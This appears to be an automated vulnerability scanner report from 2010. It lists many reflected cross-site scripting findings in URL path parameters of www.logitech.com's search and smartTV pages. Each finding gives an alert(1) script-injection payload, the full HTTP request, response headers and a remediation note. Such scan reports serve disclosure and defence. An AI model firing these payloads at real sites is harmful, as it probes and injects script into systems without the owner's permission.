The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf03a</script><script>alert(1)</script>6e0d5c86e5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cf03a</script><script>alert(1)</script>6e0d5c86e5c/search&q=`&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fc0b"><script>alert(1)</script>ac5d9aa02fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us7fc0b"><script>alert(1)</script>ac5d9aa02fc/search&q=`&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5504a"%3b9c85570ddb2 was submitted in the REST URL parameter 1. This input was echoed as 5504a";9c85570ddb2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us5504a"%3b9c85570ddb2/search&q=`&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7ac6</script><script>alert(1)</script>34cbbd003f0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/searchc7ac6</script><script>alert(1)</script>34cbbd003f0&q=`&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec14"><script>alert(1)</script>4cffb1adb2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/search2ec14"><script>alert(1)</script>4cffb1adb2d&q=`&geo=US HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.logitech.com/en-us/search?q=%60
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:02:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53894</script><script>alert(1)</script>54875662aa7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /53894</script><script>alert(1)</script>54875662aa7/smartTV HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e447f"><script>alert(1)</script>15ce01098fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-use447f"><script>alert(1)</script>15ce01098fc/smartTV HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cc58"%3befef34ce213 was submitted in the REST URL parameter 1. This input was echoed as 2cc58";efef34ce213 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us2cc58"%3befef34ce213/smartTV HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf7a6</script><script>alert(1)</script>8e28a32e23b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTVbf7a6</script><script>alert(1)</script>8e28a32e23b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37114"><script>alert(1)</script>07b94930590 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTV37114"><script>alert(1)</script>07b94930590 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6365"%3b4f9480195b0 was submitted in the REST URL parameter 1. This input was echoed as f6365";4f9480195b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usf6365"%3b4f9480195b0/smartTV/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2178"><script>alert(1)</script>fcbb65a9fd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-usa2178"><script>alert(1)</script>fcbb65a9fd7/smartTV/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60239</script><script>alert(1)</script>3510961841f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /60239</script><script>alert(1)</script>3510961841f/smartTV/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc25c"><script>alert(1)</script>0ca12d588f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/smartTVbc25c"><script>alert(1)</script>0ca12d588f6/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e979</script><script>alert(1)</script>620846be728 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTV3e979</script><script>alert(1)</script>620846be728/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d05bf"%3bde410260751 was submitted in the REST URL parameter 1. This input was echoed as d05bf";de410260751 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usd05bf"%3bde410260751/smartTV/accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcc4c"><script>alert(1)</script>89280210955 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usdcc4c"><script>alert(1)</script>89280210955/smartTV/accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de5c9</script><script>alert(1)</script>e349de2818e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /de5c9</script><script>alert(1)</script>e349de2818e/smartTV/accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aac2e</script><script>alert(1)</script>a549a741d13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTVaac2e</script><script>alert(1)</script>a549a741d13/accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88b7"><script>alert(1)</script>339c6786652 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTVa88b7"><script>alert(1)</script>339c6786652/accessories HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f60eb</script><script>alert(1)</script>76474a754f5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTV/accessoriesf60eb</script><script>alert(1)</script>76474a754f5 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b22bc"><script>alert(1)</script>cb443552ca1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTV/accessoriesb22bc"><script>alert(1)</script>cb443552ca1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a93</script><script>alert(1)</script>ff582b792ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /73a93</script><script>alert(1)</script>ff582b792ca/smartTV/accessories/devices/hd-powerline-200a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:39:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 274c4"><script>alert(1)</script>4ae733d9465 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us274c4"><script>alert(1)</script>4ae733d9465/smartTV/accessories/devices/hd-powerline-200a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:39:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2d9"%3b364e45deb32 was submitted in the REST URL parameter 1. This input was echoed as ef2d9";364e45deb32 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usef2d9"%3b364e45deb32/smartTV/accessories/devices/hd-powerline-200a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:39:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6283c</script><script>alert(1)</script>9745c6e7da8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/smartTV6283c</script><script>alert(1)</script>9745c6e7da8/accessories/devices/hd-powerline-200a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af4b6"><script>alert(1)</script>1dea7b7c4a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/smartTVaf4b6"><script>alert(1)</script>1dea7b7c4a7/accessories/devices/hd-powerline-200a HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:39:55 GMT Connection: close
